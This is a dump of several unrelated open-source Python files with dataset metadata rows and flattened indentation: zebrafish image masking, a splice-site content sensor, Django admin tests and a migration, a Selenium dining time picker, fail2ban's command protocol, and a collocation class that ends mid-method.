pt_y = canvas.last_point()[1] + segment_height * math.cos(angle_radians)
pt = (int(pt_x), int(pt_y))
# Draw line connecting points
cv2.line(canvas.canvas, canvas.last_point(), pt, 255, thickness=segment_width, lineType=cv2.LINE_AA)
# Add the new point to the MaskCanvas object's list of points
canvas.add_point(pt)
# Update 'angle_offset' on the MaskCanvas object
canvas.angle_offset += angle
return canvas
def pruneModels(test_image, canvas_set, max_num_models_to_keep, config):
for canvas in canvas_set:
score = scoreModel(canvas, test_image)
canvas.scores.append(score)
# Order canvas list by scores
canvas_set.sort(key=lambda c: c.last_score())
# Remove all masks except the ones with the top scores
keep_num = max_num_models_to_keep if len(canvas_set) > max_num_models_to_keep else len(canvas_set)
pruned_set = canvas_set[-keep_num:]
# Return the pruned set of models if tail length auto-detection is off
if config.auto_detect_tail_length == False:
return False, pruned_set
# Otherwise, decide whether to continue adding segments to the models or not
best_canvas = canvas_set[-1]
# If the configured number of consecutive segments fails to meet the threshold improvement score,
# signal that model generation should stop (i.e. no further segments should be added, and the
# final failing segments should be removed from the model)
end_generation = False
for x in range(1, config.num_fail_segments + 1):
if best_canvas.score_improvement(x) > config.segment_score_improvement_threshold:
break
if x == config.num_fail_segments:
end_generation = True
return end_generation, pruned_set
def scoreModel(canvas, test_image):
# Find pixels in the test image which overlap with the model
masked_img = cv2.bitwise_and(test_image, test_image, mask=canvas.canvas)
# Get non-zero pixels
valid_pixels = masked_img[masked_img != 0]
# Adjust pixel values so that darker pixels will score higher than lighter pixels (as fish is darker than the background)
adjusted_vals = 256 - valid_pixels
# Calculate score
score = int(cv2.sumElems(adjusted_vals)[0])
return score
def smoothMaskModel(mask_canvas, config):
points = mask_canvas.points
points = np.array(points)
points = points.astype(int)
x = points[:, 0]
y = points[:, 1]
window_length = len(y)
if window_length % 2 == 0:
window_length -= 1
polyorder = 3
yhat = savgol_filter(y, window_length, polyorder)
output_points = []
for a, b in zip(x, yhat):
new_point = [a, b]
output_points.append(new_point)
output_points = np.array(output_points)
output_points = output_points.astype(int)
mask = np.zeros(mask_canvas.canvas.shape, np.uint8)
cv2.polylines(mask, [output_points], False, 255, thickness=config.smoothed_segment_width)
return mask, output_points
def getCombinationMask(head_mask, tail_mask):
combination_mask = cv2.add(head_mask, tail_mask)
return combination_mask
def cleanMask(mask):
# Apply closing to smooth the edges of the mask
kernel_size = 5
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_size, kernel_size)) # Circle
mask_closing = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
return mask_closing
def getZebrafishMask(frame, config):
# Get orientated image and rotation angle
rotated_img, angle = getOrientation(frame, config)
# Get head mask
head_mask = getHeadMask(frame)
# Get head point
head_point = getHeadPoint(rotated_img, angle)
# Get model masks
model_masks = getModelMasks(head_mask, angle, frame, head_point, config)
# Get best mask
test_image = getTestImage(frame, head_mask, head_point, angle, config)
_, mask_set = pruneModels(test_image, model_masks, 1, config)
best_mask = mask_set[0]
# Smooth the best mask
smoothed_mask, smoothed_points = smoothMaskModel(best_mask, config)
# Get combination mask
combination_mask = getCombinationMask(head_mask, smoothed_mask)
# Clean mask
cleaned_mask = cleanMask(combination_mask)
worm_mask = cleaned_mask.copy()
contours, hierarchy = cv2.findContours(cleaned_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
if len(contours) == 0:
output = None
else:
# Remove nesting from contour
worm_cnt = contours[0]
worm_cnt = np.vstack(worm_cnt).squeeze()
# Return None values if contour too small
if len(worm_cnt) < 3:
output = None
else:
cnt_area = cv2.contourArea(worm_cnt)
output = worm_mask, worm_cnt, cnt_area, \
cleaned_mask, head_point, smoothed_points
if output is None:
return [None]*6
else:
return output
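# Minimal usage sketch (assumptions: a single-channel uint8 frame on a zero/black
# background and a ModelConfig built as in the example near the top of this file;
# the image path is hypothetical):
#
#   frame = cv2.imread('fish_frame.png', cv2.IMREAD_GRAYSCALE)
#   result = getZebrafishMask(frame, config)
#   if result[0] is not None:
#       worm_mask, worm_cnt, cnt_area, cleaned_mask, head_point, smoothed_points = result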
| mit | -7,423,540,169,153,235,000 | 32.188679 | 248 | 0.67004 | false |
ratschlab/ASP | applications/msplicer/content_sensors.py | 1 | 2271 | #
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Written (W) 2006-2007 Soeren Sonnenburg
# Written (W) 2007 Gunnar Raetsch
# Copyright (C) 2007-2008 Fraunhofer Institute FIRST and Max-Planck-Society
#
import numpy
class content_sensors:
def __init__(self, model):
self.dict_weights_intron=numpy.array(model.dict_weights_intron, dtype=numpy.float64)
self.dict_weights_coding=numpy.array(model.dict_weights_coding, dtype=numpy.float64)
self.dicts=numpy.concatenate((self.dict_weights_coding,self.dict_weights_intron, self.dict_weights_coding, self.dict_weights_intron, self.dict_weights_coding,self.dict_weights_intron, self.dict_weights_coding, self.dict_weights_intron), axis=0)
self.dicts[0, 64:] = 0 # only order 3 info
self.dicts[1, 64:] = 0 # only order 3 info
self.dicts[2, 0:64] = 0 # only order 4 info
self.dicts[2, 320:] = 0
self.dicts[3, 0:64] = 0 # only order 4 info
self.dicts[3, 320:] = 0
self.dicts[4, 0:320] = 0 # only order 5 info
self.dicts[4, 1344:] = 0
self.dicts[5, 0:320] = 0 # only order 5 info
self.dicts[5, 1344:] = 0
self.dicts[6, 0:1344] = 0 # only order 6 info
self.dicts[7, 0:1344] = 0 # only order 6 info
self.model = model
def get_dict_weights(self):
return self.dicts.T
def initialize_content(self, dyn):
dyn.init_svm_arrays(len(self.model.word_degree), len(self.model.mod_words))
word_degree = numpy.array(self.model.word_degree, numpy.int32)
dyn.init_word_degree_array(word_degree)
mod_words = numpy.array(4**word_degree, numpy.int32)
dyn.init_num_words_array(mod_words)
cum_mod_words=numpy.zeros(len(mod_words)+1, numpy.int32)
cum_mod_words[1:] = numpy.cumsum(mod_words)
dyn.init_cum_num_words_array(cum_mod_words)
dyn.init_mod_words_array(numpy.array(self.model.mod_words, numpy.int32))
dyn.init_sign_words_array(numpy.array(self.model.sign_words, numpy.bool))
dyn.init_string_words_array(numpy.zeros(len(self.model.sign_words), numpy.int32))
assert(dyn.check_svm_arrays())
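# Illustrative sketch (not from the original code base): the 'model' object passed to
# content_sensors is expected to expose dict_weights_intron, dict_weights_coding,
# word_degree, mod_words and sign_words, and 'dyn' must provide the init_* methods used
# in initialize_content(). Both come from the surrounding msplicer application.
#
#   cs = content_sensors(model)
#   weights = cs.get_dict_weights()      # transposed weight matrix for the decoder
#   cs.initialize_content(dyn)           # configures the dynamic-programming object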
| gpl-2.0 | -2,526,926,866,745,545,700 | 39.553571 | 246 | 0.693087 | false |
disqus/django-old | tests/regressiontests/admin_validation/tests.py | 1 | 9982 | from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.contrib import admin
from django.contrib.admin.validation import validate, validate_inline
from models import Song, Book, Album, TwoAlbumFKAndAnE, State, City
class SongForm(forms.ModelForm):
pass
class ValidFields(admin.ModelAdmin):
form = SongForm
fields = ['title']
class InvalidFields(admin.ModelAdmin):
form = SongForm
fields = ['spam']
class ValidationTestCase(TestCase):
def test_readonly_and_editable(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ["original_release"]
fieldsets = [
(None, {
"fields": ["title", "original_release"],
}),
]
validate(SongAdmin, Song)
def test_custom_modelforms_with_fields_fieldsets(self):
"""
# Regression test for #8027: custom ModelForms with fields/fieldsets
"""
validate(ValidFields, Song)
self.assertRaisesMessage(ImproperlyConfigured,
"'InvalidFields.fields' refers to field 'spam' that is missing from the form.",
validate,
InvalidFields, Song)
def test_exclude_values(self):
"""
Tests for basic validation of 'exclude' option values (#12689)
"""
class ExcludedFields1(admin.ModelAdmin):
exclude = ('foo')
self.assertRaisesMessage(ImproperlyConfigured,
"'ExcludedFields1.exclude' must be a list or tuple.",
validate,
ExcludedFields1, Book)
def test_exclude_duplicate_values(self):
class ExcludedFields2(admin.ModelAdmin):
exclude = ('name', 'name')
self.assertRaisesMessage(ImproperlyConfigured,
"There are duplicate field(s) in ExcludedFields2.exclude",
validate,
ExcludedFields2, Book)
def test_exclude_in_inline(self):
class ExcludedFieldsInline(admin.TabularInline):
model = Song
exclude = ('foo')
class ExcludedFieldsAlbumAdmin(admin.ModelAdmin):
model = Album
inlines = [ExcludedFieldsInline]
self.assertRaisesMessage(ImproperlyConfigured,
"'ExcludedFieldsInline.exclude' must be a list or tuple.",
validate,
ExcludedFieldsAlbumAdmin, Album)
def test_exclude_inline_model_admin(self):
"""
# Regression test for #9932 - exclude in InlineModelAdmin
# should not contain the ForeignKey field used in ModelAdmin.model
"""
class SongInline(admin.StackedInline):
model = Song
exclude = ['album']
class AlbumAdmin(admin.ModelAdmin):
model = Album
inlines = [SongInline]
self.assertRaisesMessage(ImproperlyConfigured,
"SongInline cannot exclude the field 'album' - this is the foreign key to the parent model admin_validation.Album.",
validate,
AlbumAdmin, Album)
def test_app_label_in_admin_validation(self):
"""
Regression test for #15669 - Include app label in admin validation messages
"""
class RawIdNonexistingAdmin(admin.ModelAdmin):
raw_id_fields = ('nonexisting',)
self.assertRaisesMessage(ImproperlyConfigured,
"'RawIdNonexistingAdmin.raw_id_fields' refers to field 'nonexisting' that is missing from model 'admin_validation.Album'.",
validate,
RawIdNonexistingAdmin, Album)
def test_fk_exclusion(self):
"""
Regression test for #11709 - when testing for fk excluding (when exclude is
given) make sure fk_name is honored or things blow up when there is more
than one fk to the parent model.
"""
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
exclude = ("e",)
fk_name = "album1"
validate_inline(TwoAlbumFKAndAnEInline, None, Album)
def test_inline_self_validation(self):
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
self.assertRaisesMessage(Exception,
"<class 'regressiontests.admin_validation.models.TwoAlbumFKAndAnE'> has more than 1 ForeignKey to <class 'regressiontests.admin_validation.models.Album'>",
validate_inline,
TwoAlbumFKAndAnEInline, None, Album)
def test_inline_with_specified(self):
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
fk_name = "album1"
validate_inline(TwoAlbumFKAndAnEInline, None, Album)
def test_readonly(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("title",)
validate(SongAdmin, Song)
def test_readonly_on_method(self):
def my_function(obj):
pass
class SongAdmin(admin.ModelAdmin):
readonly_fields = (my_function,)
validate(SongAdmin, Song)
def test_readonly_on_modeladmin(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("readonly_method_on_modeladmin",)
def readonly_method_on_modeladmin(self, obj):
pass
validate(SongAdmin, Song)
def test_readonly_method_on_model(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("readonly_method_on_model",)
validate(SongAdmin, Song)
def test_nonexistant_field(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("title", "nonexistant")
self.assertRaisesMessage(ImproperlyConfigured,
"SongAdmin.readonly_fields[1], 'nonexistant' is not a callable or an attribute of 'SongAdmin' or found in the model 'Song'.",
validate,
SongAdmin, Song)
def test_nonexistant_field_on_inline(self):
class CityInline(admin.TabularInline):
model = City
readonly_fields=['i_dont_exist'] # Missing attribute
self.assertRaisesMessage(ImproperlyConfigured,
"CityInline.readonly_fields[0], 'i_dont_exist' is not a callable or an attribute of 'CityInline' or found in the model 'City'.",
validate_inline,
CityInline, None, State)
def test_extra(self):
class SongAdmin(admin.ModelAdmin):
def awesome_song(self, instance):
if instance.title == "Born to Run":
return "Best Ever!"
return "Status unknown."
validate(SongAdmin, Song)
def test_readonly_lambda(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = (lambda obj: "test",)
validate(SongAdmin, Song)
def test_graceful_m2m_fail(self):
"""
Regression test for #12203/#12237 - Fail more gracefully when a M2M field that
specifies the 'through' option is included in the 'fields' or the 'fieldsets'
ModelAdmin options.
"""
class BookAdmin(admin.ModelAdmin):
fields = ['authors']
self.assertRaisesMessage(ImproperlyConfigured,
"'BookAdmin.fields' can't include the ManyToManyField field 'authors' because 'authors' manually specifies a 'through' model.",
validate,
BookAdmin, Book)
def test_cannot_include_through(self):
class FieldsetBookAdmin(admin.ModelAdmin):
fieldsets = (
('Header 1', {'fields': ('name',)}),
('Header 2', {'fields': ('authors',)}),
)
self.assertRaisesMessage(ImproperlyConfigured,
"'FieldsetBookAdmin.fieldsets[1][1]['fields']' can't include the ManyToManyField field 'authors' because 'authors' manually specifies a 'through' model.",
validate,
FieldsetBookAdmin, Book)
def test_nested_fields(self):
class NestedFieldsAdmin(admin.ModelAdmin):
fields = ('price', ('name', 'subtitle'))
validate(NestedFieldsAdmin, Book)
def test_nested_fieldsets(self):
class NestedFieldsetAdmin(admin.ModelAdmin):
fieldsets = (
('Main', {'fields': ('price', ('name', 'subtitle'))}),
)
validate(NestedFieldsetAdmin, Book)
def test_explicit_through_override(self):
"""
Regression test for #12209 -- If the explicitly provided through model
is specified as a string, the admin should still be able use
Model.m2m_field.through
"""
class AuthorsInline(admin.TabularInline):
model = Book.authors.through
class BookAdmin(admin.ModelAdmin):
inlines = [AuthorsInline]
# If the through model is still a string (and hasn't been resolved to a model)
# the validation will fail.
validate(BookAdmin, Book)
def test_non_model_fields(self):
"""
Regression for ensuring ModelAdmin.fields can contain non-model fields
that broke with r11737
"""
class SongForm(forms.ModelForm):
extra_data = forms.CharField()
class Meta:
model = Song
class FieldsOnFormOnlyAdmin(admin.ModelAdmin):
form = SongForm
fields = ['title', 'extra_data']
validate(FieldsOnFormOnlyAdmin, Song)
def test_non_model_first_field(self):
"""
Regression for ensuring ModelAdmin.field can handle first elem being a
non-model field (test fix for UnboundLocalError introduced with r16225).
"""
class SongForm(forms.ModelForm):
extra_data = forms.CharField()
class Meta:
model = Song
class FieldsOnFormOnlyAdmin(admin.ModelAdmin):
form = SongForm
fields = ['extra_data', 'title']
validate(FieldsOnFormOnlyAdmin, Song)
| bsd-3-clause | 1,530,670,665,720,559,000 | 34.523132 | 167 | 0.619415 | false |
aestheticblasphemy/aestheticBlasphemy | pl_messages/migrations/0002_auto_20200828_2129.py | 1 | 1972 | # Generated by Django 3.1 on 2020-08-28 15:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pl_messages', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='messages',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='pl_messages.messages'),
),
migrations.AlterField(
model_name='participantnotifications',
name='participant',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notified_participant', to=settings.AUTH_USER_MODEL, verbose_name='Notification Participant'),
),
migrations.AlterField(
model_name='participantthreads',
name='participant',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='thread_participant', to=settings.AUTH_USER_MODEL, verbose_name='Thread Participant'),
),
migrations.AlterField(
model_name='participantthreads',
name='threads',
field=models.ManyToManyField(related_name='participant_threads', to='pl_messages.Thread', verbose_name='Participant Threads'),
),
migrations.AlterField(
model_name='thread',
name='last_message',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='last_message_in_thread', to='pl_messages.messages', verbose_name='Last Message'),
),
migrations.AlterField(
model_name='thread',
name='messages',
field=models.ManyToManyField(related_name='thread_messages', to='pl_messages.Messages', verbose_name='Thread Messages'),
),
]
| gpl-3.0 | 7,672,388,963,139,680,000 | 41.869565 | 188 | 0.647566 | false |
dmwyatt/disney.api | pages/timepicker.py | 1 | 3504 | import datetime
import logging
import os
import time
import re
import webbrowser
from dateutil import parser
from selenium import webdriver
from selenium.common.exceptions import WebDriverException, NoSuchElementException
from selenium.webdriver.support.select import Select
from helpers import roundTime, difference_in_minutes, format_dt
from pages.helpers import wait_for
logger = logging.getLogger(__name__)
class TimeNotBookableError(Exception):
pass
class BasicTimePicker:
select_selector = 'select#diningAvailabilityForm-searchTime'
def __init__(self, browser: webdriver.PhantomJS):
self.browser = browser
@property
def select_element(self):
return self.browser.find_element_by_css_selector(self.select_selector)
@property
def select(self):
return Select(self.select_element)
@property
def option_elements(self):
return self.select_element.find_elements_by_tag_name('option')
@property
def selectable_values(self):
return [x.get_attribute('value') for x in self.option_elements]
@property
def selectable_texts(self):
return [x.text for x in self.option_elements]
def select_exact_time(self, desired_dt: datetime.datetime):
the_time = desired_dt.strftime('%H:%M')
if the_time not in self.selectable_values:
raise TimeNotBookableError("Cannot select '{}' from {}".format(the_time, self.selectable_values))
self.select.select_by_value(the_time)
def select_time_with_leeway(self, desired_dt: datetime.datetime, leeway: int):
closest = None
closest_delta = None
for sv in self.selectable_values:
if not re.match('\d\d:\d\d', sv):
continue
sv_dt = time_to_datetime(sv, desired_dt)
if not closest:
closest = sv_dt
closest_delta = difference_in_minutes(desired_dt, closest)
curr_sv_delta = difference_in_minutes(sv_dt, desired_dt)
if curr_sv_delta < closest_delta:
closest = sv_dt
closest_delta = curr_sv_delta
if closest_delta <= leeway:
self.select_exact_time(closest)
else:
raise TimeNotBookableError("There is no selectable time that's "
"less than {} minutes from {} "
"in {}".format(leeway, format_dt(desired_dt), self.selectable_values))
def select_closest_time(self, desired_dt: datetime.datetime):
closest = None
closest_delta = None
for sv in self.selectable_values:
if not re.match('\d\d:\d\d', sv):
continue
sv_dt = time_to_datetime(sv, desired_dt)
if not closest:
closest = sv_dt
closest_delta = difference_in_minutes(desired_dt, closest)
curr_sv_delta = difference_in_minutes(sv_dt, desired_dt)
if curr_sv_delta < closest_delta:
closest = sv_dt
closest_delta = curr_sv_delta
self.select_exact_time(closest)
def select_meal(self, meal):
try:
self.select.select_by_visible_text(meal)
except NoSuchElementException:
raise TimeNotBookableError("Cannot select '{}' from {}".format(meal, self.selectable_texts))
def select_breakfast(self):
self.select_meal('Breakfast')
def select_lunch(self):
self.select_meal('Lunch')
def select_dinner(self):
self.select_meal('Dinner')
def time_to_datetime(the_time: str, reference_dt: datetime.datetime) -> datetime.datetime:
"""
Takes a string representing a time and a datetime.datetime that represents the day that time
is on, and returns a datetime.datetime on that day with the new time.
"""
dt = parser.parse(the_time)
return dt.replace(year=reference_dt.year, month=reference_dt.month, day=reference_dt.day)
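# Small self-check of time_to_datetime (safe to run directly; nothing here touches
# selenium or a live page).
if __name__ == '__main__':
    _ref = datetime.datetime(2016, 5, 4)
    assert time_to_datetime('18:30', _ref) == datetime.datetime(2016, 5, 4, 18, 30)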
| mit | 4,530,609,695,152,849,400 | 27.958678 | 100 | 0.720034 | false |
jakesyl/fail2ban | fail2ban/protocol.py | 1 | 9025 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :
# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Author: Cyril Jaquier
#
__author__ = "Cyril Jaquier"
__copyright__ = "Copyright (c) 2004 Cyril Jaquier"
__license__ = "GPL"
import textwrap
##
# Describes the protocol used to communicate with the server.
protocol = [
['', "BASIC", ""],
["start", "starts the server and the jails"],
["reload", "reloads the configuration"],
["reload <JAIL>", "reloads the jail <JAIL>"],
["stop", "stops all jails and terminate the server"],
["status", "gets the current status of the server"],
["ping", "tests if the server is alive"],
["help", "return this output"],
["version", "return the server version"],
['', "LOGGING", ""],
["set loglevel <LEVEL>", "sets logging level to <LEVEL>. Levels: CRITICAL, ERROR, WARNING, NOTICE, INFO, DEBUG"],
["get loglevel", "gets the logging level"],
["set logtarget <TARGET>", "sets logging target to <TARGET>. Can be STDOUT, STDERR, SYSLOG or a file"],
["get logtarget", "gets logging target"],
["flushlogs", "flushes the logtarget if a file and reopens it. For log rotation."],
['', "DATABASE", ""],
["set dbfile <FILE>", "set the location of fail2ban persistent datastore. Set to \"None\" to disable"],
["get dbfile", "get the location of fail2ban persistent datastore"],
["set dbpurgeage <SECONDS>", "sets the max age in <SECONDS> that history of bans will be kept"],
["get dbpurgeage", "gets the max age in seconds that history of bans will be kept"],
['', "JAIL CONTROL", ""],
["add <JAIL> <BACKEND>", "creates <JAIL> using <BACKEND>"],
["start <JAIL>", "starts the jail <JAIL>"],
["stop <JAIL>", "stops the jail <JAIL>. The jail is removed"],
["status <JAIL> [FLAVOR]", "gets the current status of <JAIL>, with optional flavor or extended info"],
['', "JAIL CONFIGURATION", ""],
["set <JAIL> idle on|off", "sets the idle state of <JAIL>"],
["set <JAIL> addignoreip <IP>", "adds <IP> to the ignore list of <JAIL>"],
["set <JAIL> delignoreip <IP>", "removes <IP> from the ignore list of <JAIL>"],
["set <JAIL> addlogpath <FILE> ['tail']", "adds <FILE> to the monitoring list of <JAIL>, optionally starting at the 'tail' of the file (default 'head')."],
["set <JAIL> dellogpath <FILE>", "removes <FILE> from the monitoring list of <JAIL>"],
["set <JAIL> logencoding <ENCODING>", "sets the <ENCODING> of the log files for <JAIL>"],
["set <JAIL> addjournalmatch <MATCH>", "adds <MATCH> to the journal filter of <JAIL>"],
["set <JAIL> deljournalmatch <MATCH>", "removes <MATCH> from the journal filter of <JAIL>"],
["set <JAIL> addfailregex <REGEX>", "adds the regular expression <REGEX> which must match failures for <JAIL>"],
["set <JAIL> delfailregex <INDEX>", "removes the regular expression at <INDEX> for failregex"],
["set <JAIL> ignorecommand <VALUE>", "sets ignorecommand of <JAIL>"],
["set <JAIL> addignoreregex <REGEX>", "adds the regular expression <REGEX> which should match pattern to exclude for <JAIL>"],
["set <JAIL> delignoreregex <INDEX>", "removes the regular expression at <INDEX> for ignoreregex"],
["set <JAIL> findtime <TIME>", "sets the number of seconds <TIME> for which the filter will look back for <JAIL>"],
["set <JAIL> bantime <TIME>", "sets the number of seconds <TIME> a host will be banned for <JAIL>"],
["set <JAIL> datepattern <PATTERN>", "sets the <PATTERN> used to match date/times for <JAIL>"],
["set <JAIL> usedns <VALUE>", "sets the usedns mode for <JAIL>"],
["set <JAIL> banip <IP>", "manually Ban <IP> for <JAIL>"],
["set <JAIL> unbanip <IP>", "manually Unban <IP> in <JAIL>"],
["set <JAIL> maxretry <RETRY>", "sets the number of failures <RETRY> before banning the host for <JAIL>"],
["set <JAIL> maxlines <LINES>", "sets the number of <LINES> to buffer for regex search for <JAIL>"],
["set <JAIL> addaction <ACT>[ <PYTHONFILE> <JSONKWARGS>]", "adds a new action named <NAME> for <JAIL>. Optionally for a Python based action, a <PYTHONFILE> and <JSONKWARGS> can be specified, else will be a Command Action"],
["set <JAIL> delaction <ACT>", "removes the action <ACT> from <JAIL>"],
["", "COMMAND ACTION CONFIGURATION", ""],
["set <JAIL> action <ACT> actionstart <CMD>", "sets the start command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionstop <CMD>", "sets the stop command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actioncheck <CMD>", "sets the check command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionban <CMD>", "sets the ban command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionunban <CMD>", "sets the unban command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> timeout <TIMEOUT>", "sets <TIMEOUT> as the command timeout in seconds for the action <ACT> for <JAIL>"],
["", "GENERAL ACTION CONFIGURATION", ""],
["set <JAIL> action <ACT> <PROPERTY> <VALUE>", "sets the <VALUE> of <PROPERTY> for the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> <METHOD>[ <JSONKWARGS>]", "calls the <METHOD> with <JSONKWARGS> for the action <ACT> for <JAIL>"],
['', "JAIL INFORMATION", ""],
["get <JAIL> logpath", "gets the list of the monitored files for <JAIL>"],
["get <JAIL> logencoding", "gets the encoding of the log files for <JAIL>"],
["get <JAIL> journalmatch", "gets the journal filter match for <JAIL>"],
["get <JAIL> ignoreip", "gets the list of ignored IP addresses for <JAIL>"],
["get <JAIL> ignorecommand", "gets ignorecommand of <JAIL>"],
["get <JAIL> failregex", "gets the list of regular expressions which matches the failures for <JAIL>"],
["get <JAIL> ignoreregex", "gets the list of regular expressions which matches patterns to ignore for <JAIL>"],
["get <JAIL> findtime", "gets the time for which the filter will look back for failures for <JAIL>"],
["get <JAIL> bantime", "gets the time a host is banned for <JAIL>"],
["get <JAIL> datepattern", "gets the patern used to match date/times for <JAIL>"],
["get <JAIL> usedns", "gets the usedns setting for <JAIL>"],
["get <JAIL> maxretry", "gets the number of failures allowed for <JAIL>"],
["get <JAIL> maxlines", "gets the number of lines to buffer for <JAIL>"],
["get <JAIL> actions", "gets a list of actions for <JAIL>"],
["", "COMMAND ACTION INFORMATION",""],
["get <JAIL> action <ACT> actionstart", "gets the start command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionstop", "gets the stop command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actioncheck", "gets the check command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionban", "gets the ban command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionunban", "gets the unban command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> timeout", "gets the command timeout in seconds for the action <ACT> for <JAIL>"],
["", "GENERAL ACTION INFORMATION", ""],
["get <JAIL> actionproperties <ACT>", "gets a list of properties for the action <ACT> for <JAIL>"],
["get <JAIL> actionmethods <ACT>", "gets a list of methods for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> <PROPERTY>", "gets the value of <PROPERTY> for the action <ACT> for <JAIL>"],
]
##
# Prints the protocol in a "man" format. This is used for the
# "-h" output of fail2ban-client.
def printFormatted():
INDENT=4
MARGIN=41
WIDTH=34
firstHeading = False
for m in protocol:
if m[0] == '' and firstHeading:
print
firstHeading = True
first = True
if len(m[0]) >= MARGIN:
m[1] = ' ' * WIDTH + m[1]
for n in textwrap.wrap(m[1], WIDTH, drop_whitespace=False):
if first:
line = ' ' * INDENT + m[0] + ' ' * (MARGIN - len(m[0])) + n.strip()
first = False
else:
line = ' ' * (INDENT + MARGIN) + n.strip()
print line
##
# Prints the protocol in a "mediawiki" format.
def printWiki():
firstHeading = False
for m in protocol:
if m[0] == '':
if firstHeading:
print "|}"
__printWikiHeader(m[1], m[2])
firstHeading = True
else:
print "|-"
print "| <span style=\"white-space:nowrap;\"><tt>" + m[0] + "</tt></span> || || " + m[1]
print "|}"
def __printWikiHeader(section, desc):
print
print "=== " + section + " ==="
print
print desc
print
print "{|"
print "| '''Command''' || || '''Description'''"
| gpl-2.0 | -5,112,870,207,491,845,000 | 53.041916 | 224 | 0.668033 | false |
aravindalwan/unyque | unyque/rdimension.py | 1 | 3726 | '''Representation of a random variable used in stochastic collocation'''
__copyright__ = 'Copyright (C) 2011 Aravind Alwan'
__license__ = '''
This file is part of UnyQuE.
UnyQuE is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
UnyQuE is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
For a copy of the GNU General Public License, please see
<http://www.gnu.org/licenses/>.
'''
class RandomDimension(object):
'''Random dimension object that encapsulates the operations along one of the
dimensions in random space, which corresponds to one of the random variables
'''
kmax = 0
nodes = None
def __init__(self, bound):
self._bound = bound
@classmethod
def set_maximum_interp_level(cls, value):
cls.kmax = value
cls._init_nodes()
@classmethod
def _init_nodes(cls):
'''Initialize nodes in a hierarchical fashion as a list of sublists,
where each sublist contains the nodes added at the corresponding level
'''
cls.nodes = []
if cls.kmax > 0:
cls.nodes.append([0.5])
if cls.kmax > 1:
cls.nodes.append([0.0, 1.0])
if cls.kmax > 2:
for k in xrange(3, cls.kmax+1):
cls.nodes.append([
(1.0 + 2.0*j)/(2**(k-1)) for j in xrange(2**(k-2))])
def get_node(self, level, idx, normalized = False):
'''Return the scaled coordinates of a node at the given level and index
'''
if normalized:
return self.nodes[level-1][idx]
else:
lo = self._bound[0]
hi = self._bound[1]
return lo + (hi-lo)*self.nodes[level-1][idx]
@classmethod
def _interpolate(cls, pt1, x2):
'''Evaluate basis function centered at pt1, at x2. pt1 has to be a
tuple of the form (level, index) that specifies the interpolation level
and the index of the node at that level. x2 is any float value between
0 and 1, specifying the location where the basis function is to be
evaluated.
'''
level1, idx1 = pt1
x1 = cls.nodes[level1-1][idx1]
if level1 == 1:
return 1.0
else:
m = 2**(level1-1) + 1 # Number of nodes at this level
return (abs(x1-x2) < 1./(m-1)) * (1. - (m-1)*abs(x1-x2))
def interpolate(self, pt1, x):
'''Evaluate basis function centered at pt1, at the location x. This
method scales x to be in [0,1] and calls _interpolate to get the actual
interpolated value
'''
lo = self._bound[0]
hi = self._bound[1]
if lo <= x <= hi:
return self._interpolate(pt1, float(x-lo)/float(hi-lo))
else:
return 0.
def get_basis_function(self, pt):
'''Return bounds of the piece-wise linear basis function centered at pt.
'''
lo = self._bound[0]
hi = self._bound[1]
level, idx = pt
if level == 1:
return (lo, hi, pt)
elif level == 2:
lo = (lo + hi)/2 if idx == 1 else lo
